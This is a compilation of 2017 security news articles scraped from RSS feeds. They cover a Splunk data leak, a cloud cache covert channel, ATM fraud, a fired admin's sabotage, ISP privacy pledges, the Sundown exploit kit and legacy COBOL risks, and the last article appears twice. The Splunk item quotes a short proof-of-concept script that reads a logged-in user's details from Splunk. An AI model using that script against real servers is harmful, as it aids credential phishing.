STE WILLIAMS

Splunk has patched a slip in its JavaScript implementation that leaks user information.

The advisory at Full Disclosure explains that the leak happens if an attacker tricks an authenticated user into visiting a malicious Web page.

It only leaks the username, and whether or not that user has enabled remote access; but this would provide enough for an attacker to try follow-up phishing attacks to try and get the user’s credentials.

The bug, the advisory says, is how Splunk used Object prototypes in JavaScript.

Here’s the proof-of-concept JavaScript from the advisory:

script
Object.defineProperty( Object.prototype, "$C", { set:function(val){
   //prompt("Splunk Timed out:nPlease Login to SplunknUsername:
"+val.USERNAME, "Password")
for(var i in val){
 alert(""+i+" "+val[i]);
  }
 }
});
/script

script src="https://VICTIM-IP:8000/en-US/config?autoload=1" type="text/javascript"
/script

The issue affects Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.13.1, 6.1.x before 6.1.13, 6.0.x before 6.0.14, 5.0.x before 5.0.18 and Splunk Light before 6.5.2, and the company has issued patches for all versions. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/04/03/that_sound_you_hear_is_splunk_leaking_data/

A group of researchers say they can extract information from an Amazon Web Services virtual machine by probing the cache of a CPU it shares with other cloudy VMs.

A paper titled Hello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud (PDF) explains the challenges of extracting data from CPU cache, a very contested resource in which the OS, the hypervisor and applications all conduct frequent operations. All that activity makes a lot of noise, defying attempts to create a persistent communications channel.

Until now, as the researchers claim they’ve built “a high-throughput covert channel [that] can sustain transmission rates of more than 45 KBps on Amazon EC2”. They’ve even encrypted it: the technique establishes a TCP network within the cache and transmits data using SSH.

The results sound scarily impressive: a Black Hat Asia session detailing their work promised to peer into a host’s cache and stream video from VM to VM.

The paper explains that this stuff is not entirely new, but has hitherto also not been entirely successful because it’s been assumed that “error-correcting code can be directly applied, and the assumption that noise effectively eliminates covert channels.”

The authors knock both of those arguments over, the first by figuring out a way to handle errors and the second with a method of scheduling communication between two VMs.

The paper details those efforts extensively, names them a “Cache-based Jamming Agreement” and offer you working code on GitHub so you can build your own all-in-cache covert channel, either on-premises or in the cloud.

Getting this going in the cloud is non-trivial, because you must first figure out how to get two VMs running on the same host. A 2015 paper titled A Placement Vulnerability Study in Multi-Tenant Public Clouds found that’s possible in Amazon, Google and Azure and is cited by “Hello from the Other Side’s” authors.

Yes, this is a little esoteric. But it also shows why many users are willing to shell out for dedicated instances in their chosen clouds. We can also see that secure multi-tenancy may have a way to go. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/03/31/researchers_steal_data_from_shared_cache_of_two_cloud_vms/

Your daily round-up of some of the other stories in the news

Two jets in close shaves with drones

Two commercial jets using London’s Heathrow airport had close shaves with drones, aviation authorities reported on Friday. In its monthly “airprox” report for February, the CAA and MAA said that in the first incident, a drone flew within 20 metres of an Airbus A320 in October last year, while in the second case, also involving an A320, the pilot saw a drone about 50 metres away from his right wing at about 1,000 metres.

Investigators said that in one of the “Category A” incidents, “a collision had only been narrowly avoided”. These incidents bring the number of reported incidents during the past 12 months up to 59, all of which are recorded on an interactive map.

Lawmakers are pondering making the registration of new drones compulsory, while large drones are banned from flying above 121 metres or near airports and airfields.

Germany to launch military cyber-command

With cyber-attacks on nations’ military forces on the rise, Germany will become the latest country to launch a cyber-command next week as it aims to boost its online defences against attacks, Reuters reported.

The defence ministry said some 284,000 attacks against its military had been recorded in just the first nine weeks of 2017, while NATO said that it had seen a five-fold increase in “suspicious events” in the past three years.

The cyber-command, which will be based in Bonn, the former capital of what was then West Germany, will have an equal status to that of the army, navy and air force, and will start off with 260 staff. That’s set to grow to 13,500 by July.

Lieutenant General Ludwig Leinhos, the commander of the unit, said that the unit would both protect the military’s IT infrastructure and develop and war-game offensive tactics: “In order to be able to defend yourself, you have to know the options for attack.”

Adult tube sites switch to HTTPS

If you prefer your entertainment to be of the NSFW and adult kind and are also keen on browsing securely, you’ll be pleased to hear that two of the big porn web clip sites, PornHub and sister site YouPorn, are switching to HTTPS by default: PornHub switched on Thursday and YouPorn will follow suit on April 4.

As The Verge notes, these two sites were two of the 11 adult websites listed on Google’s 100 most visited sites: as of April 4, when these two have made the switch, only five of those will be encrypted.

Shifting to HTTPS means that while ISPs will know you’re browsing an adult site, they won’t be able to see what you were browsing, which should reassure US web users who were dismayed at the move by Congress to downgrade their privacy.

Catch up with all of today’s stories on Naked Security

Follow @NakedSecurity
Follow @katebevan

 

 

 

 

 

 

 

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/7UqlwUXV4o0/

Improved technologies in the banking sector have failed to stem the rising tide of fraud in the US, according to a study by analytic software firm FICO.

The US’s belated move to EMV (Europay, MasterCard and Visa) chip-equipped cards hasn’t curtailed fraud as much as many had hoped, based on the successful rollout of the technology years ago across Europe.

The number of payment cards compromised at US ATMs and merchants rose 70 per cent last year. Compromises of ATMs and merchant devices in the US rose 30 percent, following a six-fold (546 per cent) increase from 2014 to 2015.

These figures cover only card fraud occurring at physical devices, not online card fraud.

It’s a generally bleak picture, with the one bright spot being that vendors are detecting compromised devices more quickly. The average duration of a compromise is steadily decreasing – an ATM or POS device would be compromised on average for 11 days in 2016, compared to 14 days in 2015. The 2016 average duration is less than a third of the average duration two years ago in 2014, which was 36 days.

“As the last few years have proven, skimming technology and knowhow have improved and are more accessible to the general population, so we will continue to see increases in compromises and the speed at which they occur,” said TJ Horan, vice president of fraud solutions at FICO.

FICO works with banks and card issuers around the world to identify fraud trends and curtail card fraud. FICO’s Card Alert Service monitors hundreds of thousands of ATMs and other readers in the US.

More details on trends in ATM and point of sale fraud – together with top tips on how to avoid becoming a victim of fraud – can be found in a blog post by FICO here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/03/31/us_atm_fraud_trends/

A former IT administrator working at a cowboy boot manufacturer has pled guilty to hacking the servers and cloud accounts of his employer after they fired him and had him removed from the building.

Joe Vito Venzor, 41, had been employed by the Lucchese Boot Company in El Paso, Texas, but he was let go on September 1 last year. This didn’t go well – the criminal complaint [PDF] states that he became “volatile” and that it took staff an hour to get him out of the building after his meeting with the IT director.

As a precaution, Venzor’s access rights were revoked as he left the building. However an hour later an “elphaser” administrator account logged onto the company’s network and shut down the corporate email server, followed by its application server, which ran – among other things – the main production line.

The attacker deleted files on the servers to block any attempts for a reboot, and then set to work on the firm’s cloud accounts, shutting them down or changing the passwords. Very quickly the entire company’s IT infrastructure came under attack.

Suspecting the obvious, the IT director investigated Venzor’s work email account and found he had emailed a document to his private email address. The document was a list of network access codes and passwords for various IT subsystems, listed coincidentally in the exact order that the firm’s accounts were in the process of being hacked.

Race against time

Using the list, the director got ahead of the attacker and began changing passwords himself to mitigate some of the damage and lock out illegitimate access after 45 minutes. This was only partially successful and, after three hours of trying to get the servers back online, the other manufacturing and admin staff were told to go home for the day.

The attacker’s work was so effective that the application server was totally borked and the company ended up having to buy a new one and reinstall all the software on it. Outside IT staff had to be brought in to sort out the mess and the firm claims it lost $100,000 in new orders, on top of all the extra IT costs.

During the course of the cleanup, investigators found that Venzor had set up the elphaser account from his work computer, which no one else had access to. The account was designed to look like an innocuous service account, but had full admin privileges where none were needed.

He was arrested shortly after the attack by the FBI and charged with unauthorized intrusion upon protected computers. On Thursday he admitted his crimes and now faces up to 10 years in jail and a possible $250,000 fine, plus paying the costs of his old employer. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/03/31/it_admin_pleads_guilty_to_hacking_bosses/

Update US cable giant Comcast is looking to calm public outrage over its newfound ability to sell the browsing histories of its customers.

In a post to the company’s corporate policy blog, chief privacy officer Gerard Lewis vowed not to take advantage of the recently passed legislation limiting the FCC’s ability to protect consumer privacy.

“At Comcast, we respect and protect our customers’ personal information. Always have, always will,” Lewis wrote.

“We do not sell our broadband customers’ individual web browsing history. We did not do it before the FCC’s rules were adopted, and we have no plans to do so.”

Lewis goes on to vow that Comcast, notorious for its poor customer service, will continue to abide by a privacy policy it says was already in compliance with the FCC’s privacy rules for ISPs, and whatever data it does share with advertisers can be opted out of by subscribers.

“Comcast has committed to privacy principles that are consistent with the FTC’s privacy regime, which has applied to all entities in the Internet ecosystem for over 20 years and which continues to apply to Internet edge companies like Google, Facebook, and Amazon,” the Comcast privacy chief and deputy general counsel said.

“We believe this commitment is legally enforceable in multiple ways, including by state Attorneys General.”

That is not to say, however, that Comcast has anything against this week’s controversial legislation. Rather, Lewis argues, people are making too much of the effort to put consumer privacy squarely in the hands of those who stand to make money by exploiting it.

“In view of all the misinformation and inaccurate statements that have been made in the last week, we want to make sure that our customers understand how strong our privacy protections really are,” says Lewis.

“So we will revise our privacy policy to make more clear and prominent that, contrary to the many inaccurate statements and reports, we do not sell our customers’ individual web browsing information to third parties and that we do not share sensitive information unless our customers have affirmatively opted in to allow that to occur.”

Comcast says its customers shouldn’t worry about having their browsing histories or personal information sold off by Comcast, because the cable giant doesn’t have any immediate plans to do so. And if they do decide to change that policy, customers should rely on the state governments to stand up to a company that writes its own laws in many places.

In short, Comcast may be able to sell out its customers now, but customers should trust them not to.

And who can you trust, if not the company that once changed a customer’s name to “Asshole Brown” out of spite? ®

Updated to add

Comcast is not the only ISP promising to play nice. Verizon, which was recently caught using illegal “supercookies” to track users, says of selling browser histories: “We don’t do it and that’s the bottom line.”

Meanwhile, ATT, the carrier that was fined by the FCC for letting scammers insert bogus charges onto customer bills, says it “had the same protections in place the day before the Congressional resolution was passed, and we will have the same protections the day after President Trump signs the CRA into law.”

Like Comcast, both carriers have less-than-stellar histories of protecting customer privacy, and both now believe customers should simply take their word that the new-found freedoms to deal in personal info for profit will not be abused.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/03/31/comcast_we_will_never_sell_your_data/

New exploits and obfuscation tactics have made once second-tier EK a potent threat, researchers from Cisco Talos say.

Attacks involving the use of exploit kits dropped off dramatically and have remained low ever since Russian authorities arrested over four-dozen individuals believed to be associated with the Angler EK last year. But a few kits remain active and continue to pose a threat to users.

One of them is Sundown, an exploit kit that many considered relatively unsophisticated a few months ago but has gradually evolved into a substantial threat.

Researchers from Cisco’s Talos who have been tracking the kit this week described Sundown as having matured into a major player within the exploit landscape since they last saw it.

“Many of the ‘calling cards’ that have historically been associated with Sundown have been removed, possibly indicating that the threat actors are making an attempt to make it more difficult to identify as Sundown,” says Talos threat researcher Edmund Brumaghin. “Sundown is now one of the most heavily leveraged exploit kits since the disappearance of several larger exploit kits.”

Many of the exploit kit’s original identifiers have been stripped, making it harder to spot. For instance, previous versions of the EK used to contain multiple references to the Yugoslavian Business Network, making it easily identifiable. Those references are now missing. Missing too in new versions of Sundown are the numeric subfolders and numeric file names and proper extensions that were the markers of the old EK.

Several new exploits have been added to Sundown, while some, like those targeting vulnerabilities in the Silverlight browser plugin, have been dropped. Among the new exploits is one that is based on a publicly available proof of concept targeting a recently disclosed vulnerability in the Microsoft Edge browser. Sundown is one of the few EKs in the world that have added new exploits in recent months, according to Talos.

Sundown also appears to have adopted a new approach to compromising systems. Unlike other kits that use just a single exploit to try and compromise a system, Sundown deploys its entire collection of malware tools against a potential victim. The approach, while noisy, appears designed to give the EK the best chance of breaking into a system, Talos said in the alert.

Sundown has changed in other ways as well. Previously for instance, the exploit kit would retrieve its payload via the web browser. The current version of Sundown retrieves the payload via the command line and the use of a Windows service for executing VBScript files.

The approach is similar to, and indeed appears borrowed from, the one used by another malware kit—RIG-v—to retrieve its payload. Sundown’s payloads now reside on a different server from the one it uses to host its landing page and exploit pages. “The use of different servers for hosting exploit payloads indicates that the actors behind Sundown may be experimenting with more complex infrastructure design for the exploit kit,” Brumaghin says.

One of the most significant changes to the Sundown EK campaign is the use of domain resellers to collect domains for hosting Sundown activity. The authors of the kit appear to be buying legitimately registered domains in bulk from resellers in an apparent bid to avoid blacklists and other filters. In many cases, the authors of Sundown are looking for domains that have been registered for at least one week to avoid filters that block domains that have just been registered.

“Several of the largest, most heavily leveraged Exploit Kits [such as] Angler, Neutrino, Nuclear, have largely disappeared from the threat landscape,” Brumaghin says. “Sundown has remained operational and this increased development and maturation may be indicative of their desire to fill the void left behind by the other larger exploit kits that have stopped operations.”

Related stories:

• Exploit Kit-Based Attacks Decline Dramatically
• Exploit Kits: Winter 2017 Review
• Researchers Disrupt Angler Exploit Kit, Ransomware Operation

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: http://www.darkreading.com/attacks-breaches/sundown-rises-as-new-threat-in-depleted-exploit-kit-landscape/d/d-id/1328535?_mc=RSS_DR_EDT

EO ultimately led to sanctions against Russia for hacking and other attempts to tamper with the outcome of the US election.

President Donald J. Trump has quietly extended for one year the “national emergency” executive order issued by his predecessor Barack Obama that ultimately led to the sanctions and retaliatory measures taken by the Obama administration against Russian officials for that nation’s role in hacking activities targeting the US election.

“On April 1, 2015, by Executive Order 13694, the President declared a national emergency pursuant to the International Emergency Economic Powers Act (50 U.S.C. 1701-1706) to deal with the unusual and extraordinary threat to the national security, foreign policy, and economy of the United States constituted by the increasing prevalence and severity of malicious cyber-enabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States. On December 28, 2016, the President issued Executive Order 13757 to take additional steps to address the national emergency declared in Executive Order 13694.

“These significant malicious cyber-enabled activities continue to pose an unusual and extraordinary threat to the national security, foreign policy, and economy of the United States. For this reason, the national emergency declared on April 1, 2015, must continue in effect beyond April 1, 2017. Therefore, in accordance with section 202(d) of the National Emergencies Act (50 U.S.C. 1622(d)), I am continuing for 1 year the national emergency declared in Executive Order 13694.”

The official filing is here in the Federal Register.

 

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: http://www.darkreading.com/risk/trump-extends-obamas-eo-for-sanctioning-hackers/d/d-id/1328536?_mc=RSS_DR_EDT

So, we started with a report on “legacy” COBOL systems still being in use and a report suggesting this represented a security risk, since the writers of those systems have retired and are dying off. We wanted a quick sanity check and found ourselves pinned to a wall of naivete pretty quickly. One technology journalist we spoke to, for example, reckoned there might be a few machines out there running Windows XP but only a handful, and nothing older.

At the personal computing level this might be right. On a corporate level and looking at the systems on which many people depend for their daily functions, it couldn’t be more wrong. The study we were looking at, from SSRN, covered the American IRS system. It also covered 2015’s breach of the US Office of Personnel Management, both of which run on old COBOL systems. Asking around, we found the same was true of British systems and banks internationally.

So if no-one’s able to update these things, is the security automatically compromised?

Nuanced ‘legacy’

Simon Bevan, who worked for IBM for 25 years from the 1960s, was at pains to point out that “legacy” had to encompass only things that were no longer maintained. This didn’t mean they were no longer fit for purpose, however. He was one of the developers behind IPARS, the original airline reservation code, from which most of the modern equivalents have evolved. He says:

Needless to say, there are not many of us left who could help if things went wrong. Whatever the case, the core reservations code is extremely stable and running in a stable and well maintained environment.

Reassuringly, he and his team gave some thought to the longevity of the systems they were developing at the time (he was also part of the first online banking system, for the Bank of Montreal). He added:

Knowing the complexity and cost of designing these core systems, I assumed that they would continue to exist at the centre of any subsequent extensions of the original applications.

The development priority in the then foreseeable future would be to capitalise on the original systems by extending their capabilities rather than rewriting the core functions. At that time, it was IBM’s strategy to protect the customers’ development investment by guaranteeing system compatibility into the future.

Others saw potential issues. Oliver Kraus, IT consultant, said:

You have two main security concerns – the one is of the technology itself, and the second is of your own code. Since the first kind is generic, the more chances someone will know of the vulnerability, but the more chances there will be a solution or a ‘patch’ to cover for it. Because of the high costs of developing the software from scratch, the need to teach all of the developers a new technology, and the risk of creating bugs or security vulnerabilities, many CTOs prefer to keep the old technology.

Job for life

The ageing developer population remains an issue for many, however. Anthony Peake, managing director at Software Solved, said the public sector is one of the few areas in which the notion of the “job for life” still retains any clout. This is why it’s only now coming to light that there is an ageing system problem. He added:

Those who are coming in or just entering the software profession, understandably, don’t want to learn code and systems that are decades old. Equally, those who do understand and have worked with COBOL and other legacy systems such as Delphi, are now coming to the end of their careers or have simply forgotten how to work with the tool. There are specialists but they cost a lot.

So is there an actual risk? He thinks so.

A number of government bodies simply bury their heads in the sand. Budget restrictions or lack of skills simply means that everything stays the same. This, of course, opens them up to other risks. COBOL and Delphi were secure at the time of implementation, but the world has moved on considerably and new threats such as injection attacks are simply not covered by legacy software.

The sheer size of the risk has also increased. Systems now might be on the public internet or part of a wider corporate network, again not considered when the original systems were implemented putting public data at risk.

John Walker, visiting professor at the School of Computing and Informatics, Notthingham Trent University, and owner and MD of Secure-Bastion Ltd, puts it pretty bluntly:

At the end of the day it is a case of ‘security through obscurity’ versus ‘devoid security through confusion’. On one hand, we have the inferred security represented by say, non-routable protocols, or mainframe speciation partitions such as LPAR. On the other side of the security coin we have unpatched outdated systems such as NT4.0 residing inside virtualisation. No matter, the outcomes are the same: confusion, and a very big potential for unknown unknowns of insecurity to reside within the operational environment.

Bevan goes back to fundamentals to address the issue. Buy systems from established vendors who have some longevity and who maintain their systems. Of course, patch everything, and design your own software in a modular fashion so that you can incorporate new functions and features easily.

Treat data as you would treat money. Always control access to data and always encrypt databases, but be aware that this is protection against casual copying not against insider activity.

And don’t forget that technology doesn’t exist in any sort of vacuum, adds Bevan:

Continuously update the application logic to accommodate changes in the real world. Regularly review, enhance and document the component functions. Review the technologies, environment and supporting facilities upon which your software depends.

And if you have an older developer in your workforce, be nice to them. They may turn out to be extremely important…

Follow @NakedSecurity
Follow @GuyClapperton

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/KhCpJJBbzMw/

So, we started with a report on “legacy” COBOL systems still being in use and a report suggesting this represented a security risk, since the writers of those systems have retired and are dying off. We wanted a quick sanity check and found ourselves pinned to a wall of naivete pretty quickly. One technology journalist we spoke to, for example, reckoned there might be a few machines out there running Windows XP but only a handful, and nothing older.

At the personal computing level this might be right. On a corporate level and looking at the systems on which many people depend for their daily functions, it couldn’t be more wrong. The study we were looking at, from SSRN, covered the American IRS system. It also covered 2015’s breach of the US Office of Personnel Management, both of which run on old COBOL systems. Asking around, we found the same was true of British systems and banks internationally.

So if no-one’s able to update these things, is the security automatically compromised?

Nuanced ‘legacy’

Simon Bevan, who worked for IBM for 25 years from the 1960s, was at pains to point out that “legacy” had to encompass only things that were no longer maintained. This didn’t mean they were no longer fit for purpose, however. He was one of the developers behind IPARS, the original airline reservation code, from which most of the modern equivalents have evolved. He says:

Needless to say, there are not many of us left who could help if things went wrong. Whatever the case, the core reservations code is extremely stable and running in a stable and well maintained environment.

Reassuringly, he and his team gave some thought to the longevity of the systems they were developing at the time (he was also part of the first online banking system, for the Bank of Montreal). He added:

Knowing the complexity and cost of designing these core systems, I assumed that they would continue to exist at the centre of any subsequent extensions of the original applications.

The development priority in the then foreseeable future would be to capitalise on the original systems by extending their capabilities rather than rewriting the core functions. At that time, it was IBM’s strategy to protect the customers’ development investment by guaranteeing system compatibility into the future.

Others saw potential issues. Oliver Kraus, IT consultant, said:

You have two main security concerns – the one is of the technology itself, and the second is of your own code. Since the first kind is generic, the more chances someone will know of the vulnerability, but the more chances there will be a solution or a ‘patch’ to cover for it. Because of the high costs of developing the software from scratch, the need to teach all of the developers a new technology, and the risk of creating bugs or security vulnerabilities, many CTOs prefer to keep the old technology.

Job for life

The ageing developer population remains an issue for many, however. Anthony Peake, managing director at Software Solved, said the public sector is one of the few areas in which the notion of the “job for life” still retains any clout. This is why it’s only now coming to light that there is an ageing system problem. He added:

Those who are coming in or just entering the software profession, understandably, don’t want to learn code and systems that are decades old. Equally, those who do understand and have worked with COBOL and other legacy systems such as Delphi, are now coming to the end of their careers or have simply forgotten how to work with the tool. There are specialists but they cost a lot.

So is there an actual risk? He thinks so.

A number of government bodies simply bury their heads in the sand. Budget restrictions or lack of skills simply means that everything stays the same. This, of course, opens them up to other risks. COBOL and Delphi were secure at the time of implementation, but the world has moved on considerably and new threats such as injection attacks are simply not covered by legacy software.

The sheer size of the risk has also increased. Systems now might be on the public internet or part of a wider corporate network, again not considered when the original systems were implemented putting public data at risk.

John Walker, visiting professor at the School of Computing and Informatics, Notthingham Trent University, and owner and MD of Secure-Bastion Ltd, puts it pretty bluntly:

At the end of the day it is a case of ‘security through obscurity’ versus ‘devoid security through confusion’. On one hand, we have the inferred security represented by say, non-routable protocols, or mainframe speciation partitions such as LPAR. On the other side of the security coin we have unpatched outdated systems such as NT4.0 residing inside virtualisation. No matter, the outcomes are the same: confusion, and a very big potential for unknown unknowns of insecurity to reside within the operational environment.

Bevan goes back to fundamentals to address the issue. Buy systems from established vendors who have some longevity and who maintain their systems. Of course, patch everything, and design your own software in a modular fashion so that you can incorporate new functions and features easily.

Treat data as you would treat money. Always control access to data and always encrypt databases, but be aware that this is protection against casual copying not against insider activity.

And don’t forget that technology doesn’t exist in any sort of vacuum, adds Bevan:

Continuously update the application logic to accommodate changes in the real world. Regularly review, enhance and document the component functions. Review the technologies, environment and supporting facilities upon which your software depends.

And if you have an older developer in your workforce, be nice to them. They may turn out to be extremely important…

Follow @NakedSecurity
Follow @GuyClapperton

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/KhCpJJBbzMw/